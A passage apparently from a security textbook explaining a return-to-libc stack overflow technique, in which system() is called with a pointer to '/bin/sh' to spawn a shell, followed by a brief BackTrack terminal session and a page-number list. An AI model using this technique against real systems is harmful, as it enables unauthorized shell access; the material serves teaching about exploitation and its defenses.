At this point, the system() function will be entered
and the system() prolog will be called, which will build another stack frame on top of
the position marked ???Filler,??? which for all intents and purposes now becomes our new
saved eip (to be executed after the system() function returns). Now, as you would
expect, the arguments for the system() function are located just below the new saved eip
(marked ???Filler??? in the diagram). Since the system() function is expecting one argument
(a pointer to the string of the filename to be executed), we will supply the pointer of the
string ???/bin/sh??? at that location. In this case, we don??™t actually care what we return to
after the system function executes. If we did care, we would need to be sure to replace
Filler with a meaningful function pointer like exit().
Let??™s look at an example on a SLAX bootable CD (BackTrack v.2.0):
BT book $ uname -a
Linux BT 2.6.18-rc5 #4 SMP Mon Sep 18 17:58:52 GMT 2006 i686 i686 i386 GNU/
Linux
BT book $ cat /etc/slax-version
SLAX 6.0.0
NOTE It should be noted at this point that stack randomization makes these
types of attacks very hard to do (not impossible). Basically, brute force needs
to be used to guess the addresses involved, greatly reducing your odds of
success.
Pages:
345
346
347
348
349
350
351
352
353
354
355
356
357
358
359
360
361
362
363
364
365
366
367
368
369